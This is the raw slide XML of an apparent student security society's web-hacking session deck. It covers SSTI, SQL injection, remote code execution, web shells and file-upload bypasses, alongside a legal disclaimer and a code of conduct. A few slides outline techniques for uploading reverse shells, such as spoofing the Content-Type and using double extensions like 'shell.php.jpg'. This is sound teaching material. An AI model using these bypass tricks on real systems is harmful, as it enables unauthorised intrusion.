              <a:rPr b="1" lang="en-GB" sz="900"/>
              <a:t>SSTI</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900"/>
              <a:t>Mitigating the exploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=JcOR9krOPFY&amp;t=2820s</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="900"/>
              <a:t>SQLI</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900"/>
              <a:t>Overview of attacks and mitigations: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/SQL_Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900"/>
              <a:t>Gaining a shell: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://resources.infosecinstitute.com/topic/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900"/>
              <a:t>Blind Injection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/sql-injection/blind</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="900"/>
              <a:t>Repos</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>https://github.com/Twigonometry/Deserialisation-Demo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>https://github.com/Twigonometry/CTF-Tools/blob/master/scripts/jpegify.sh</a:t>
            </a:r>
            <a:endParaRPr sz="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The skills taught in these sessions allow identification and exploitation of security vulnerabilities in systems. We strive to give you a place to practice legally, and can point you to other places to practice. These skills should not be used on systems where you do not have explicit permission from the owner of the system. It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VERY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> easy to end up in breach of relevant laws, and we can accept no responsibility for anything you do with the skills learnt here. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>If we have reason to believe that you are utilising these skills against systems where you are not authorised you will be banned from our events, and if necessary the relevant authorities will be alerted. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Remember, if you have any doubts as to if something is legal or authorised, just don't do it until you are able to confirm you are allowed to.</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
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p1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The Legal Bit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Any questions?</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>To recap any of the basics, see our Juice Shop Sessions from first semester:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://shefesh.com/assets/wiki/Give%20it%20a%20Go%20-%20An%20Introduction%20to%20Web%20Hacking%20-%20PDF.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://shefesh.com/assets/wiki/Juice%20Shop%20Session%20-%20PDF.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>And keep an eye on the CTF Tools repository for an example of the Blind SQLI script</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>(if I get round to it...)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p31"/>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That’s about it!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439325" y="4034250"/>
            <a:ext cx="3663300" cy="576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300">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>www.shefesh.com</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Thanks for coming!</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="174" name="Google Shape;174;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="924050" y="1111100"/>
            <a:ext cx="2693850" cy="2699606"/>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2"/>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Upcoming Sessions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p32"/>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What’s up next?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.shefesh.com/sessions</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p32"/>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Next Week: Game Hacking/Hack the Box</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Easter Break!</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Before proceeding past this point you must read and agree to our Code of Conduct - this is a requirement from the University for us to operate as a society. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>If you have any doubts or need anything clarified, please ask a member of the committee.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Breaching the Code of Conduct = immediate ejection and further consequences.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Code of Conduct can be found at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://shefesh.com/downloads/SESH%20Code%20of%20Conduct.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;69;p1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Code of Conduct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idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478965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Code Injection</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Why is this bad?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Arbitrary Single Commands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Web Shells (PHP, Reverse Shells etc)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Untrusted Data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Anything</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>supplied by a user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Could be from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, or an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uploaded file</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p1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 Quick Recap</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Google Shape;76;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154775"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Methodology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Enumerate the website: Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nmap &amp; Gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, look at the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t> source code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, look for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> folder</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Do you need credentials anywhere? How is authentication handled?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Look for something interactive - can you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submit data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What do requests look like? Is there an API endpoint?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Can you provoke error messages? Can you use default credentials?</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File Upload Restrictions</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;82;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="389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100"/>
              <a:t>Why does this matter?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Uploading reverse shells</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Provoking errors</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>How can we bypass restrictions?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> header (for example, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Filename tricks</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Extra extensions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
